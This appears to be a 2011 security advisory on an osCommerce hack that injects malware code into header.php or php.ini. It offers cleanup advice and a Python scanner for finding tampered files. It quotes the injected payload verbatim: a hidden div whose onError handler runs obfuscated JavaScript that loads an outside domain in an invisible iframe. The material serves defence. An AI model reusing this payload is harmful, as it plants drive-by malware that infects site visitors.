osCommerce Malware Hack

Updated: March 28, 2011

The osCommerce malware hack uses a vulnerability in osCommerce to place code into websites that causes them to distribute malware. In most cases the code is placed at the bottom of the /includes/header.php file, and in some cases it may also be in the /admin/includes/header.php file. In other cases a php.ini file is modified with an auto_append_file= line, which causes PHP files to be appended with another file added by the hacker. The first time a user accesses the website, the code places a malware script on the page. Some of the domains the malware script has called a file from are

To clean the website, either the website needs to be reverted to a clean backup, or the hack code needs to be removed from the header.php and any backdoor scripts added to the website need to be removed (our Basic Backdoor Script Finder will find some of the most popular backdoor scripts).
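The two injection points described above can be checked against a clean backup before cleaning. The following is an added example, not code from this page or from osCommerce: the function names, the clean-backup directory layout and the sample files are assumptions, and the sample content is constructed.

```python
import re
import tempfile
from pathlib import Path

# The two files the page names as injection points.
HEADER_FILES = ("includes/header.php", "admin/includes/header.php")
# An active (not ';'-commented) auto_append_file line with a non-empty value.
APPEND_RE = re.compile(r'^[ \t]*auto_append_file[ \t]*=[ \t]*["\']?([^"\'\s;]+)', re.I | re.M)

def find_auto_append(site_root):
    """Return (php.ini path, appended file) for each active auto_append_file line."""
    hits = []
    for ini in sorted(Path(site_root).rglob("php.ini")):
        text = ini.read_text(errors="replace")
        for m in APPEND_RE.finditer(text):
            if m.group(1).lower() != "none":  # PHP treats "none" as disabled
                hits.append((ini.relative_to(site_root).as_posix(), m.group(1)))
    return hits

def appended_lines(site_root, clean_root):
    """Return {header file: lines that are not in the clean backup copy}."""
    report = {}
    for rel in HEADER_FILES:
        live, clean = Path(site_root, rel), Path(clean_root, rel)
        if not (live.is_file() and clean.is_file()):
            continue
        live_txt = live.read_text(errors="replace")
        base = clean.read_text(errors="replace").rstrip()
        if live_txt.rstrip() == base:
            continue
        # Code added at the bottom is a pure suffix; any other change is reported whole.
        extra = live_txt[len(base):] if live_txt.startswith(base) else live_txt
        report[rel] = extra.strip().splitlines()
    return report

def demo():
    """Build a constructed clean tree and a tampered copy, then scan the copy."""
    original = "<?php\n// header\n?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for root in (clean, live):
            for rel in HEADER_FILES:
                Path(root, rel).parent.mkdir(parents=True)
                Path(root, rel).write_text(original)
        tampered = original + "<?php /* constructed stand-in for injected code */ ?>\n"
        (live / HEADER_FILES[0]).write_text(tampered)
        (live / "php.ini").write_text("; constructed\nauto_append_file = /tmp/placeholder.php\n")
        return find_auto_append(live), appended_lines(live, clean)

if __name__ == "__main__":
    print(demo())
```

Any file reported by `find_auto_append` should itself be inspected and removed along with the php.ini line, since it is the file the hacker added.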

For osCommerce 2.2, the best way to prevent the vulnerabilities from being exploited is by renaming and password protecting the admin directory. osCommerce 2.3 does not contain the vulnerabilities, but it is still recommended to rename and password protect the admin directory.

Recent Script Format On Web Pages:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="10101010" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"10101010"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1287163664"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>

version of code added to header.php: